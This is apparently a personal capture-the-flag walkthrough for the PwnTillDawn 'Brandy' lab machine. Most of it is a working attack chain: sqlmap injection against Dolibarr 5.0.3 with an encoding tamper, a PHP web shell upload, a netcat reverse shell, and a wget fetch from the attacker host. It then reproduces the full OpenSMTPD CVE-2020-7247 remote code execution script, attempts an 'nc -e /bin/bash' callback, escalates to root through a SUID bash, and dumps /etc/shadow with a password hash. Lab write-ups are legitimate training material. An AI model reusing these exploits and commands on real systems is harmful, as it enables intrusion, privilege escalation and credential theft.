.
.brandy
nikto points to:
#### rick’s notes #### (in case i again forget – too much booze…)
vhost:crm.pwntilldawn.com
FLAG61=2971f3459fe55db1237aad5e0f0a259a41633962
vist crm.pwntilldawn.com
<!– authentication mode = dolibarr –>
<!– cookie name used for this session = DOLSESSID_5474197992fc593fa65df7a4b2996a9f –>
<!– urlfrom in this session = –>
<!– Common footer is not used for login page, this is same than footer but inside login tpl –>
The Dolibarr web application version 5.0.3 is vulnerable to SQL injection in multiple places. Exploiting this vulnerability leads to an authenticated user being able to inject arbitrary SQL statements, e.g. to dump the entire database.
In addition, the filter in use by Dolibarr to prevent SQL injections can be easily bypassed by URL encoding SQL payloads. This can as well be automated with SQLmap and tamper script “charencode”.
http://crm.pwntilldawn.com/documents/
http://10.150.150.27/dolibarr/comm/propal/list.php?mainmenu=commercial
FLAG62=543d3e087a6764fbeb3d42f58c59b78e201e7f69 wizlynx group<br>Customer code
http://10.150.150.27/dolibarr/user/card.php?id=2
http://10.150.150.27/dolibarr/comm/propal/card.php?id=1
┌─[user@parrot-virtual]─[~/ptd/brandy] └──╼ $
sqlmap -r req3.req —tamper=charencode
┌─[user@parrot-virtual]─[~/ptd/brandy] └──╼ $
cat req3.req
GET /dolibarr/comm/propal/list.php?leftmenu=propals&viewstatut=0 HTTP/1.1 Host: 10.150.150.27 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: DOLSESSID_f0571041dc8c54860123aeb2450c451b=5474197992fc593fa65df7a4b2996a9f Upgrade-Insecure-Requests: 1
┌─[user@parrot-virtual]─[~/ptd/brandy] $
sqlmap -r req3.req —tamper=charencode –batch –dump
.
$sqlmap -r req3.req –dbs –batch
$sqlmap -r req3.req –dbs –batch
$sqlmap -r req3.req —tamper=charencode –sql-shell
$sqlmap -r req3.req —tamper=charencode –os-shell
-> sqlmap finds user cliff / donation
http://crm.pwntilldawn.com/don/index.php?leftmenu=donations&mainmenu=accountancy
FLAG64=6bf7c50b228c4672b590615b5cbcb73bb44614fd 1.00 04/13/2020 Validated
make donation
http://crm.pwntilldawn.com/document.php?modulepart=don&file=2%2Fpuckie.php.noexe
modify, rename noexe to shell.php
then access ! : http://crm.pwntilldawn.com/documents/don/2/puckieshell.php
└──╼ #nc -nlvp 53
listening on [any] 53 …
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.27] 47072
Linux Brandy 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:06:47 up 1:00, 1 user, load average: 0.04, 0.05, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
brandy tty1 – 29Sep20 26days 0.10s 0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
Brandy
$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
wget http://10.66.66.42/1.py’
┌─[user@parrot-virtual]─[~/ptd/brandy]
└──╼ $cat 1.py
# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))
res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
print('[!] No OpenSMTPD detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
┌─[user@parrot-virtual]─[~/ptd/brandy]
$ python3 1.py
Usage 1.py <target ip> <target port> <command>
E.g. 1.py 127.0.0.1 25 ‘touch /tmp/x’
$ python3 1.py 127.0.0.1 25 ‘touch /tmp/x’
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
$ ls -la
total 36
drwxrwxrwt 2 root root 4096 Jan 27 09:48 .
drwxr-xr-x 24 root root 4096 Apr 4 2020 ..
-rw-rw-rw- 1 www-data www-data 0 Jan 27 09:48 y
$
python3 1.py 127.0.0.1 25 ‘nc 10.66.66.142 443 -e /bin/bash’
but did’nt invoke rev shell
just do ‘chmod +s /bin/bash’
than bash -p and you’re root
www-data@Brandy:/dev/shm$ python3 1.py 127.0.0.1 25 'chmod +s /bin/bash' python3 1.py 127.0.0.1 25 'chmod +s /bin/bash' [*] OpenSMTPD detected [*] Connected, sending payload [*] Payload sent [*] Done bash-4.4$ bash -p bash -p bash-4.4# id id uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) bash-4.4# cat /etc/shadow cat /etc/shadow root:*:18295:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: --snip-- sshd:*:18356:0:99999:7::: mysql:!:18356:0:99999:7::: brandy:$6$RuiaYFAl$a3fWptLaRSblY5Z3jkasInf6oLKrS8dUTcfL1H.KKbH9AOBTZN0nT4vHbI9tdFs4uXjkNq2F2hofDSEsDqPWp/:18365:0:99999:7::: opensmtpd:*:18365:0:99999:7::: opensmtpq:*:18365:0:99999:7::: bash-4.4#
$ python3 1.py 127.0.0.1 25 ‘chmod +s /bin/bash’
bash-4.4# cat FLAG66
cat FLAG66
This was a tricky machine … so if you read this, well done!
FLAG66=e075fab32dea389109b4a0023ffe9b4fb87d2feb
find . -iname “FLAG*”
cat /var/www/html/dolibarr/FLAG65
FLAG65=185d65d0fd6049385ab53eae8be28b2c79023bc2
found in user card 3 cliff http://crm.pwntilldawn.com/user/card.php?id=3
FLAG63=4eedbe365eede0a18ab90b63c209284dd653add9